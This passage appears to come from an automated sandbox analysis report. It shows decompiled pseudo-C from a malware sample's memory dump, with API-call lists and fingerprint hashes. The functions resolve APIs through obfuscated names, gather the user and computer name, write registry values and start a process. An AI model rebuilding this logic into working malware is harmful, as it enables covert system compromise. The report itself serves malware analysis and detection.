                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E0447A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E0447A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x447d2a8; // 0xb9a5a8
                                                          							_t31 = _t66 + 0x447ec28; // 0x73006d
                                                          							 *0x447d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E0447A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04476C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04476C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04476C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04476C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04476CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04476D0A
                                                          • lstrlen.KERNEL32(?), ref: 04476D13
                                                          • lstrlen.KERNEL32(?), ref: 04476D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04476D21
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 81000aa86d58409c0efab6860d91764b16f5bf1acab101e9a1c8587be71473c8
                                                          • Instruction ID: d5d36108481e2e9c7df0e60934f14164f95d97c86ab936f1393094267b52741b
                                                          • Opcode Fuzzy Hash: 81000aa86d58409c0efab6860d91764b16f5bf1acab101e9a1c8587be71473c8
                                                          • Instruction Fuzzy Hash: 8E416C76C00209FBDF12AFA4CC489DEBBB5EF44358F154066EA04B7211DB39EA52DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E04478EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E0447592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E0447A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x447d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t18 = _t47 + 0x447e3e6; // 0x73797325
                                                          					_t68 = E04473C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t19 = _t50 + 0x447e747; // 0x5018cef
                                                          						_t20 = _t50 + 0x447e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E0447A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E0447A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x447d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E0447A734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0447592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04478EBD,?,00000001,?,?,00000000,00000000), ref: 04475952
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04475974
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0447598A
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044759A0
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044759B6
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044759CC
                                                          • memset.NTDLL ref: 04478F0B
                                                            • Part of subcall function 04473C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04478F24,73797325), ref: 04473C59
                                                            • Part of subcall function 04473C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04473C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,05018CEF,73797325), ref: 04478F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04478F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04478FB0
                                                            • Part of subcall function 0447A62D: GetProcAddress.KERNEL32(36776F57,0447A2D4), ref: 0447A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04478F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04478F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04478F96
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: d62d1dfac8f859064a5361949d1bd561412b099ed4fe835b49122d2e901af22b
                                                          • Instruction ID: df94ebbe9240b9da7e51a330af1faae898a1691eb5599f7802951aaf5d28fb13
                                                          • Opcode Fuzzy Hash: d62d1dfac8f859064a5361949d1bd561412b099ed4fe835b49122d2e901af22b
                                                          • Instruction Fuzzy Hash: 3E312EB2900208BFEF20AFA4DC88DDEBBB9EB44344F10456AE605B7211D735AD46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E04471BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t1 = _t9 + 0x447e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E0447173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E0447A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E044764EF(_t34, _t41, _a8);
                                                          						E0447A734(_t41);
                                                          						_t42 = E04476467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E0447A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E044717E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E0447A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E0447A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0447173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04471BD0,253D7325,00000000,00000000,7742C740,?,?,044720C2,?), ref: 044717A4
                                                            • Part of subcall function 0447173D: sprintf.NTDLL ref: 044717C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                          • lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • strcpy.NTDLL ref: 04471C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 044764EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04471C1A,00000000,?,?,?,044720C2,?,050195B0), ref: 04476506
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
                                                            • Part of subcall function 04476467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04471C34,00000000,?,?,044720C2,?,050195B0), ref: 04476471
                                                            • Part of subcall function 04476467: _snprintf.NTDLL ref: 044764CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 4ad8cfe0708a3777ffeb85ada745f2969429894169b5033d40e17f90aa743039
                                                          • Instruction ID: 69ae9a47f85a715516a562ee31447f9c7cd84a1050b6ca2bb22d3b3c25f5d5f4
                                                          • Opcode Fuzzy Hash: 4ad8cfe0708a3777ffeb85ada745f2969429894169b5033d40e17f90aa743039
                                                          • Instruction Fuzzy Hash: 8111E3779012246B6F127BF58C85CEF3BAD9E85668315012BFA00AB201DE28ED0387A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 044768EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 044768FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04476911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476993
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1be9170128e7bbdf95fb6f6fb27e4a0d22f0c817c03b9e96c73bd66eb754bc64
                                                          • Instruction ID: a327f6c45f5d01f554dd8816dd9038e453cb3794283c7fceb5ed74cb497cbb42
                                                          • Opcode Fuzzy Hash: 1be9170128e7bbdf95fb6f6fb27e4a0d22f0c817c03b9e96c73bd66eb754bc64
                                                          • Instruction Fuzzy Hash: 54418072900A09AFDF01DFB8C8446DFB7BAEF88310F154426E904EB221DA71AD06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0447592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E0447A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t1 = _t23 + 0x447e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t2 = _t26 + 0x447e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E0447A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t5 = _t30 + 0x447e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x447d2a8; // 0xb9a5a8
                                                          							_t7 = _t33 + 0x447e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x447d2a8; // 0xb9a5a8
                                                          								_t9 = _t36 + 0x447e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x447d2a8; // 0xb9a5a8
                                                          									_t11 = _t39 + 0x447e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E04476604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04478EBD,?,00000001,?,?,00000000,00000000), ref: 04475952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04475974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0447598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044759A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044759B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044759CC
                                                            • Part of subcall function 04476604: memset.NTDLL ref: 04476683
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 735903b9a6cab42ee955430d56ef01b48d3c86a3bff28d67401bdb510fd77050
                                                          • Instruction ID: 8c071583858f231fcfa55a84ac081294b247893332ae362c7d3532eb5ad85987
                                                          • Opcode Fuzzy Hash: 735903b9a6cab42ee955430d56ef01b48d3c86a3bff28d67401bdb510fd77050
                                                          • Instruction Fuzzy Hash: 2B2191F060060ABFEB20EF69C884D9BB7ECEF443047018566E909CB211EB34ED078B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0447853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x447d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E04479070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E04476E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E0447A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x447d278; // 0x5019a98
                                                          					_t16 = _t64 + 0xc; // 0x5019b66
                                                          					_t65 = E04479070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d0447c0
                                                          						if(E044722F1(_t97,  *_t33, _t91, _a8,  *0x447d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x447d2a8; // 0xb9a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x447ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x447e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E04476C38(_t69,  *0x447d334,  *0x447d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x447d2a8; // 0xb9a5a8
                                                          									_t44 = _t71 + 0x447e846; // 0x74666f53
                                                          									_t73 = E04479070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d0447c0
                                                          										E04475D7D( *_t47, _t91, _a8,  *0x447d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d0447c0
                                                          										E04475D7D( *_t49, _t91, _t99,  *0x447d330, _a16);
                                                          										E0447A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d0447c0
                                                          									E04475D7D( *_t40, _t91, _a8,  *0x447d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d0447c0
                                                          									E04475D7D( *_t43, _t91, _a8,  *0x447d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E0447A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d0447c0
                                                          					_t81 = E04478BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d0447c0
                                                          							E044722F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E0447A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E0447A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E0447A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x447d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(04473741,0000005F,00000000,00000000,00000104), ref: 04478572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0447859F
                                                            • Part of subcall function 04479070: lstrlen.KERNEL32(?,00000000,05019A98,00000000,04478808,05019C76,?,?,?,?,?,63699BC3,00000005,0447D00C), ref: 04479077
                                                            • Part of subcall function 04479070: mbstowcs.NTDLL ref: 044790A0
                                                            • Part of subcall function 04479070: memset.NTDLL ref: 044790B2
                                                            • Part of subcall function 04475D7D: lstrlenW.KERNEL32(?,?,?,04478708,3D0447C0,80000002,04473741,0447A513,74666F53,4D4C4B48,0447A513,?,3D0447C0,80000002,04473741,?), ref: 04475DA2
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 044785C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 2d492d14d51f3e41f568b38f7412978d81aaf17efe127e1f60129981e2bae6ce
                                                          • Instruction ID: 53cf4ffba29b299ac1d3a8116d26c7e2aff9751e7754f3f1e14a519c0b625ace
                                                          • Opcode Fuzzy Hash: 2d492d14d51f3e41f568b38f7412978d81aaf17efe127e1f60129981e2bae6ce
                                                          • Instruction Fuzzy Hash: F0516A72510209BFEF21AF61DD88DDA77B9FF04354F00851AF91556120D739E927DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0447A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E0447A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E0447A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x4471fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04471FD2), ref: 0447A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04471FD2), ref: 0447A1C9
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04471FD2), ref: 0447A203
                                                          • GetComputerNameW.KERNEL32(04471FD2,?), ref: 0447A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04471FD2,00000000,04471FD4,00000000,00000000,?,?,04471FD2), ref: 0447A249
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: e1b854b8ee16e9a94272e5654cc0acb51a92c33cafb2c30abdf126602b4d9569
                                                          • Instruction ID: f5c37847098cb32857a8e51a6f6a35d5177c8721b0e502588fa0476da3c72ffb
                                                          • Opcode Fuzzy Hash: e1b854b8ee16e9a94272e5654cc0acb51a92c33cafb2c30abdf126602b4d9569
                                                          • Instruction Fuzzy Hash: E721EA76A01208FFDB11DFE5D9849EEBBB8FF44304B1444AAE601E7240E635AB46DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04473DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E04475AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E0447A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x447d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
